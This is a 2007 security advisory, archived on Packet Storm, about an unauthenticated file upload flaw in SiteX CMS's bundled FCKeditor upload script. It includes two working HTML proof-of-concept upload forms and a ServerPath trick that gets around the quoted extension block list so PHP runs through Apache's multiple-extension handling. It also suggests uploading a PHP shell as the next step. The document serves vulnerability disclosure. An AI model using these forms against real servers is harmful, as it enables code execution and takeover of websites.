what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

waraxe-2007-SA057.txt

waraxe-2007-SA057.txt
Posted Sep 28, 2007
Authored by Janek Vind aka waraxe | Site waraxe.us

SiteX CMS is susceptible to an unauthorized file upload vulnerability.

tags | exploit, file upload
SHA-256 | f140776b42ea2d5cfcabf66ae5f0716bd312a92afebbe27bf5a4c4df5a2838a4

waraxe-2007-SA057.txt

Change Mirror Download

[waraxe-2007-SA#057] - Unauthorized File Upload in SiteX CMS
====================================================================

Author: Janek Vind "waraxe"
Date: 27. September 2007
Location: Estonia, Tartu
Web: http://www.waraxe.us/advisory-57.html


Target software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

http://sitex.bjsintay.com/

SiteX is a versitile web tool that will enable you to start your own
dynamic website in under 5 minutes. Driven by PHP and MySQL, SiteX
consists of components common to most personal and professional websites.

Vulnerabilities: file upload possibilities
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SiteX CMS contains third-party scripts from FCKeditor. One of them is:
"includes/fck/editor/filemanager/upload/php/upload.php". This particular
script does not have any checks against user validity and anyone can try
to upload files to SiteX-powered website.

Here is proof-of-concept file for testing:

------------>[proof-of-concept]<-----------
<html>
<body>
<center>
<form action="http://localhost/sitex.0.7.3.beta/includes/fck/editor/
filemanager/upload/php/upload.php?ServerPath=/sitex.0.7.3.beta/"
enctype="multipart/form-data" method="post">
<input type="file" name="NewFile" size="140">
<input type="submit" value="Test">
</center>
</body>
</html>
------------>[/proof-of-concept]<-----------

Parameter "ServerPath" must be changed as needed. Now, by using this
PoC upload file we can upload to victim server any files, except with
some predefined (dangerous) extensions.

$Config['DeniedExtensions']['File'] = array('php','php2','php3',
'php4','php5','phtml','pwml','inc','asp','aspx','ascx','jsp','cfm',
'cfc','pl','bat','exe','com','dll','vbs','js','reg','cgi') ;

But we really want to upload php scripts to victim webserver ...
Well, let's assume, that we have php file "test.waraxe". As we see,
file extension is "waraxe" :)
Now there is another PoC testfile:

------------>[proof-of-concept]<-----------
<html>
<body>
<center>
<form action="http://localhost/sitex.0.7.3.beta/includes/fck/editor/
filemanager/upload/php/upload.php?ServerPath=/sitex.0.7.3.beta/x.php."
enctype="multipart/form-data" method="post">
<input type="file" name="NewFile" size="140">
<input type="submit" value="Test">
</center>
</body>
</html>
------------>[/proof-of-concept]<-----------

And when we use this upload form, then we will have file named
"x.php.test.waraxe" in target webserver. Does anyone recall "RAR exploit"?
Google for "RAR exploit coppermine" and find out, that Apache webserver
has interesting feature: if we request file with unknown extension (".waraxe")
and if filename contains ".php.", then Apache will try to handle it as php file :)
So that we can now upload to webserver any php files and get php scripting level
access to target server. Next step can be uploading php shell and escalating
attack.

//-----> See ya soon and have a nice day ;) <-----//

Greetings:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Greets to ToXiC, LINUX, y3dips, Sm0ke, Heintz, slimjim100, Chb
and all other people who know me!
Greetings to Raido Kerna.
Tervitusi Torufoorumi rahvale!

Contact:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

come2waraxe@yahoo.com
Janek Vind "waraxe"

Homepage: http://www.waraxe.us/


Shameless advertise:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Biology books - http://biology.oldreadings.com/
Sevice Manuals - http://service-manuals.waraxe.us/

---------------------------------- [ EOF ] ------------------------------------
Login or Register to add favorites

File Archive:

September 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    261 Files
  • 2
    Sep 2nd
    17 Files
  • 3
    Sep 3rd
    38 Files
  • 4
    Sep 4th
    52 Files
  • 5
    Sep 5th
    23 Files
  • 6
    Sep 6th
    27 Files
  • 7
    Sep 7th
    0 Files
  • 8
    Sep 8th
    1 Files
  • 9
    Sep 9th
    16 Files
  • 10
    Sep 10th
    0 Files
  • 11
    Sep 11th
    0 Files
  • 12
    Sep 12th
    0 Files
  • 13
    Sep 13th
    0 Files
  • 14
    Sep 14th
    0 Files
  • 15
    Sep 15th
    0 Files
  • 16
    Sep 16th
    0 Files
  • 17
    Sep 17th
    0 Files
  • 18
    Sep 18th
    0 Files
  • 19
    Sep 19th
    0 Files
  • 20
    Sep 20th
    0 Files
  • 21
    Sep 21st
    0 Files
  • 22
    Sep 22nd
    0 Files
  • 23
    Sep 23rd
    0 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    0 Files
  • 27
    Sep 27th
    0 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close